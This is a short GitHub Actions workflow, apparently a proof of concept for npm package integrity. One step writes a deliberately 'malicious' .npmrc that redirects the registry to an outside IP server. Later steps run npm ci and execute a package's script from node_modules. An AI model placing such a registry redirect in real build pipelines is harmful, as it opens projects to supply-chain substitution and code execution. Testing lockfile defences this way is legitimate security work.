name: Package Integrity PoC
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'

      - name: Create malicious .npmrc file
        # â— IMPORTANT: Change the URL below to your server's IP!
        run: echo "registry=http://34.227.190.3 :4873" > .npmrc

      - name: Attempt to install packages
        # npm ci is strict and uses the lockfile. This SHOULD fail.
        run: npm ci

      - name: Execute the package script (will not be reached if npm ci fails)
        run: node ./node_modules/@aiyana-dev/legit-package/index.js
